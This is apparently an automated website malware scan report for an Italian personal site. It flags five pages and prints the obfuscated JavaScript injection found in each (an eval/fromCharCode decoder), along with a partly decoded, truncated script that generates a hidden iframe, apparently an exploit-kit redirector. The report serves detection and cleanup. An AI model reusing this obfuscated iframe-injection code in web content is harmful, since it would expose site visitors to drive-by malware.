Malware Scanner report for luca-stella.com

Malicious/Suspicious/Total urls checked: 5/0/19

5 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "luca-stella.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=luca-stella.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://luca-stella.com/	HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 27 Feb 2015 04:01:07 GMT Location: http://www.luca-stella.com/ Server: Apache Content-Length: 235 Content-Type: text/html; charset=iso-8859-1	clean
http://www.luca-stella.com/	HTTP/1.1 200 OK Date: Fri, 27 Feb 2015 04:01:07 GMT Accept-Ranges: bytes ETag: "8c527992bc90cd1:461fd8" Server: Microsoft-IIS/6.0 Content-Length: 10888 Content-Location: http://www.luca-stella.com/index.htm Content-Type: text/html Last-Modified: Wed, 12 Sep 2012 07:59:44 GMT MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET	clean
http://www.luca-stella.com/index.htm	HTTP/1.1 200 OK Date: Fri, 27 Feb 2015 04:01:08 GMT Accept-Ranges: bytes ETag: "8c527992bc90cd1:461fd8" Server: Microsoft-IIS/6.0 Content-Length: 10888 Content-Type: text/html Last-Modified: Wed, 12 Sep 2012 07:59:44 GMT MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET	clean
http://www.luca-stella.com/homepage.htm	200 OK Content-Length: 19275 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) try{vfE++;}catch(ABWTE){try{GZDG\|15232}catch(ewabgre){m=Math;ev=eval;}ff="fromCha";ff+="rCode";n="1428&&1755&&1540&&1485&&1624&&1575&&1554&&1650&&448&&1650&&1414&&1800&&1624&&1230&&1358&&1650&&1400&&1665&&1526&&1170&&1638&&1635&&1372&&1515&&1596&&600&&574&&1845&&182&& ... 8504 bytes are skipped ...;1414&&1455&&1624&&1515&&1400&&480&&854&&480&&1638&&1650&&1400&&1515&&1428&&1575&&1540&&1515&&1400&&885&&1750&&195&&140&&1875&&616&&480&&686&&720&&672&&615&&826&&480".split("&&");h=2;s="";if(m)for(i=0;i-1774!=0;i=1+i){k=i;s+=String[ff](n[i]/(i%h+016));}ev(s);} Decoded script: function nextRandomNumber(){ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.seed * this.oneOverM); } function RandomNumberGenerator(unix){ var d = new Date(unix1000); var s = Math.ceil(d.getHours()/3); this.seed = 2345678901 + ... 4669 bytes are skipped ... ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); iframeWasCreated = true; } } catch (e) { iframeWasCreated = undefined; } }, 100 / var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return Antivirus reports: K7AntiVirus Trojan DrWeb JS.IFrame.364 Kaspersky HEUR:Trojan.Script.Iframer Microsoft Trojan:JS/Iframeinject.AB NANO-Antivirus Trojan.Script.Agent.xyevo F-Prot JS/IFrame.QW AVG Script/Exploit.Kit.N Commtouch JS/IFrame.QW
http://www.luca-stella.com/fotogallery.html	200 OK Content-Length: 11678 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) try{vfE++;}catch(ABWTE){try{GZDG\|15232}catch(ewabgre){m=Math;ev=eval;}ff="fromCha";ff+="rCode";n="1428&&1755&&1540&&1485&&1624&&1575&&1554&&1650&&448&&1650&&1414&&1800&&1624&&1230&&1358&&1650&&1400&&1665&&1526&&1170&&1638&&1635&&1372&&1515&&1596&&600&&574&&1845&&182&& ... 8504 bytes are skipped ...;1414&&1455&&1624&&1515&&1400&&480&&854&&480&&1638&&1650&&1400&&1515&&1428&&1575&&1540&&1515&&1400&&885&&1750&&195&&140&&1875&&616&&480&&686&&720&&672&&615&&826&&480".split("&&");h=2;s="";if(m)for(i=0;i-1774!=0;i=1+i){k=i;s+=String[ff](n[i]/(i%h+016));}ev(s);} Decoded script: function nextRandomNumber(){ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.seed * this.oneOverM); } function RandomNumberGenerator(unix){ var d = new Date(unix1000); var s = Math.ceil(d.getHours()/3); this.seed = 2345678901 + ... 4669 bytes are skipped ... ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); iframeWasCreated = true; } } catch (e) { iframeWasCreated = undefined; } }, 100 / var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return Antivirus reports: K7AntiVirus Trojan DrWeb JS.IFrame.364 Kaspersky HEUR:Trojan.Script.Iframer Microsoft Trojan:JS/Iframeinject.AB NANO-Antivirus Trojan.Script.Agent.xyevo F-Prot JS/IFrame.QW AVG Script/Exploit.Kit.N Commtouch JS/IFrame.QW
http://www.luca-stella.com/swfobject.js	200 OK Content-Length: 16940 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) try{vfE++;}catch(ABWTE){try{GZDG\|15232}catch(ewabgre){m=Math;ev=eval;}ff="fromCha";ff+="rCode";n="1428&&1755&&1540&&1485&&1624&&1575&&1554&&1650&&448&&1650&&1414&&1800&&1624&&1230&&1358&&1650&&1400&&1665&&1526&&1170&&1638&&1635&&1372&&1515&&1596&&600&&574&&1845&&182& ... 8508 bytes are skipped ...1414&&1455&&1624&&1515&&1400&&480&&854&&480&&1638&&1650&&1400&&1515&&1428&&1575&&1540&&1515&&1400&&885&&1750&&195&&140&&1875&&616&&480&&686&&720&&672&&615&&826&&480".split("&&");h=2;s="";if(m)for(i=0;i-1774!=0;i=1+i){k=i;s+=String[ff](n[i]/(i%h+016));}ev(s);} Decoded script: function nextRandomNumber(){ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.seed * this.oneOverM); } function RandomNumberGenerator(unix){ var d = new Date(unix1000); var s = Math.ceil(d.getHours()/3); this.seed = 2345678901 + ... 4669 bytes are skipped ... ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); iframeWasCreated = true; } } catch (e) { iframeWasCreated = undefined; } }, 100 / var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return Antivirus reports: K7AntiVirus Trojan DrWeb JS.IFrame.364 Kaspersky HEUR:Trojan.Script.Iframer Microsoft Trojan:JS/Iframeinject.AB NANO-Antivirus Trojan.Script.Agent.xyevo F-Prot JS/IFrame.QW AVG Script/Exploit.Kit.N Commtouch JS/IFrame.QW
http://www.luca-stella.com/test404page.js	404 Not Found Content-Length: 1635 Content-Type: text/html	clean
http://luca-stella.com/downloadZone.htm	HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 27 Feb 2015 04:01:10 GMT Location: http://www.luca-stella.com/downloadZone.htm Server: Apache Content-Length: 251 Content-Type: text/html; charset=iso-8859-1	clean
http://www.luca-stella.com/downloadzone.htm	200 OK Content-Length: 22609 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) try{vfE++;}catch(ABWTE){try{GZDG\|15232}catch(ewabgre){m=Math;ev=eval;}ff="fromCha";ff+="rCode";n="1428&&1755&&1540&&1485&&1624&&1575&&1554&&1650&&448&&1650&&1414&&1800&&1624&&1230&&1358&&1650&&1400&&1665&&1526&&1170&&1638&&1635&&1372&&1515&&1596&&600&&574&&1845&&182&& ... 8504 bytes are skipped ...;1414&&1455&&1624&&1515&&1400&&480&&854&&480&&1638&&1650&&1400&&1515&&1428&&1575&&1540&&1515&&1400&&885&&1750&&195&&140&&1875&&616&&480&&686&&720&&672&&615&&826&&480".split("&&");h=2;s="";if(m)for(i=0;i-1774!=0;i=1+i){k=i;s+=String[ff](n[i]/(i%h+016));}ev(s);} Decoded script: function nextRandomNumber(){ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.seed * this.oneOverM); } function RandomNumberGenerator(unix){ var d = new Date(unix1000); var s = Math.ceil(d.getHours()/3); this.seed = 2345678901 + ... 4669 bytes are skipped ... ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); iframeWasCreated = true; } } catch (e) { iframeWasCreated = undefined; } }, 100 / var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return Antivirus reports: K7AntiVirus Trojan DrWeb JS.IFrame.364 Kaspersky HEUR:Trojan.Script.Iframer Microsoft Trojan:JS/Iframeinject.AB NANO-Antivirus Trojan.Script.Agent.xyevo F-Prot JS/IFrame.QW AVG Script/Exploit.Kit.N Commtouch JS/IFrame.QW
http://www.luca-stella.com/downloadZone.htm	200 OK Content-Length: 22609 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) try{vfE++;}catch(ABWTE){try{GZDG\|15232}catch(ewabgre){m=Math;ev=eval;}ff="fromCha";ff+="rCode";n="1428&&1755&&1540&&1485&&1624&&1575&&1554&&1650&&448&&1650&&1414&&1800&&1624&&1230&&1358&&1650&&1400&&1665&&1526&&1170&&1638&&1635&&1372&&1515&&1596&&600&&574&&1845&&182&& ... 8504 bytes are skipped ...;1414&&1455&&1624&&1515&&1400&&480&&854&&480&&1638&&1650&&1400&&1515&&1428&&1575&&1540&&1515&&1400&&885&&1750&&195&&140&&1875&&616&&480&&686&&720&&672&&615&&826&&480".split("&&");h=2;s="";if(m)for(i=0;i-1774!=0;i=1+i){k=i;s+=String[ff](n[i]/(i%h+016));}ev(s);} Decoded script: function nextRandomNumber(){ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.seed * this.oneOverM); } function RandomNumberGenerator(unix){ var d = new Date(unix1000); var s = Math.ceil(d.getHours()/3); this.seed = 2345678901 + ... 4669 bytes are skipped ... ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); iframeWasCreated = true; } } catch (e) { iframeWasCreated = undefined; } }, 100 / var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return Antivirus reports: K7AntiVirus Trojan DrWeb JS.IFrame.364 Kaspersky HEUR:Trojan.Script.Iframer Microsoft Trojan:JS/Iframeinject.AB NANO-Antivirus Trojan.Script.Agent.xyevo F-Prot JS/IFrame.QW AVG Script/Exploit.Kit.N Commtouch JS/IFrame.QW
http://www.luca-stella.com/Alabama.zip	200 OK Content-Length: 300746 Content-Type: application/x-zip-compressed	clean
http://www.luca-stella.com/by-bago.zip	200 OK Content-Length: 302794 Content-Type: application/x-zip-compressed	clean
http://www.luca-stella.com/foto-conte.zip	200 OK Content-Length: 300744 Content-Type: application/x-zip-compressed	clean
http://www.luca-stella.com/video-conte.zip	404 Not Found Content-Length: 1635 Content-Type: text/html	clean
http://www.luca-stella.com/FOTO-BY-FLAVIO.zip	200 OK Content-Length: 300744 Content-Type: application/x-zip-compressed	clean
http://www.luca-stella.com/video-riky.zip	404 Not Found Content-Length: 1635 Content-Type: text/html	clean
http://www.luca-stella.com/by-miky.zip	200 OK Content-Length: 300747 Content-Type: application/x-zip-compressed	clean
http://www.luca-stella.com/by-petruzz.zip	200 OK Content-Length: 300745 Content-Type: application/x-zip-compressed	clean
http://www.luca-stella.com/FOTO-BY-RIKY.zip	200 OK Content-Length: 300744 Content-Type: application/x-zip-compressed	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: luca-stella.com

Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 27 Feb 2015 04:01:07 GMT
Location: http://www.luca-stella.com/
Server: Apache
Content-Length: 235
Content-Type: text/html; charset=iso-8859-1

...235 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: luca-stella.com
Referer: http://www.google.com/search?q=luca-stella.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for luca-stella.com

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools